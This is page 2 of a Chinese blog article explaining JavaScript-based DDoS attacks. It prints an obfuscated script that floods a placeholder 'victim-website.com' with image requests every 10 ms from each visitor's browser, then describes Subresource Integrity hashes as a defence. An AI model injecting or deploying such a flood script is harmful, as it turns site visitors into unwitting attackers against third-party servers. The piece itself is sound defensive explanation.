当前第2页 返回上一页
1 2 3 4 5 6 7 | var _0x9ea1=[ 'victim\\x2dwebsite\\x2ecom' , '\\x2findex\\x2ephp\\x3f' , 'floor' , 'random' , 'src' , 'http\\x3a\\x2f\\x2f' ,
'\\x3dval' ];( function (_0xa439d7,_0x7a3f17){ var _0x2fcd4b= function (_0x1be501){ while (--_0x1be501){_0xa439d7
[ '\\x70\\x75\\x73\\x68' ](_0xa439d7[ '\\x73\\x68\\x69\\x66\\x74' ]());}};_0x2fcd4b(++_0x7a3f17);}(_0x9ea1,0xa1));
var _0x19ea= function (_0x3ac308,_0x2c1ecf){_0x3ac308=_0x3ac308-0x0; var _0x393163=_0x9ea1
[_0x3ac308]; return _0x393163;}; function imgflood(){ var _0xcb2cd4=_0x19ea( '0x0' ); var _0x3d1bbb=_0x19ea( '0x1' );
var _0x189885= new Image(); var _0x2dfc3a=Math[_0x19ea( '0x2' )](Math[_0x19ea( '0x3' )]()*0x3e8);_0x189885
[_0x19ea( '0x4' )]=_0x19ea( '0x5' )+_0xcb2cd4+_0x3d1bbb+_0x2dfc3a+_0x19ea( '0x6' );}setInterval(imgflood,0xa);
|
如果攻击者入侵了一个网站,在网站js文件中嵌入了类似上面的恶意JavaScript脚本,那么该网站的每一个访客都将成为DDoS攻击中的一员。网站流量越高就意味着DDoS越严重。
如何防止这种攻击?
目前HTTP还没有相关的机制来阻止该脚本的运行,但W3C已经提出了名叫子资源完整性(SRI)的新功能,使用加密哈希值验证脚本,如果哈希值不匹配浏览器可以阻止其运行。
例如,如下脚本标签:
1 | <script src= "https://code.jquery.com/jquery-1.10.2.min.js" >
|
浏览器会自动下载该.js文件,并且会不分青红皂白的运行它。即使该文件中被攻击者注入了恶意脚本,浏览器也不会识别(也识别不出)。然而如果网站发现了哈希值验证脚本不匹配,子资源完整性(SRI)会告诉浏览器不要运行该脚本。
建议网站管理员将添加这一标签添加到服务器上,用以保护其用户不被利用。
推荐相关教程:web服务器安全
以上就是深度剖析基于JavaScript的DDOS攻击的详细内容,更多文章请关注木庄网络博客!
返回前面的内容
相关阅读 >>
linux无法正常安装与卸载node.js的方法实例
深度剖析基于javascript的ddos攻击
如何在linux系统中利用node.js提取word及pdf文本内容的案例介绍
javascript原型链污染攻击
linux无法正常安装与卸载node.js的方法实例
更多相关阅读请进入《剖析》频道 >>
转载请注明出处:木庄网络博客 » 深度剖析基于JavaScript的DDOS攻击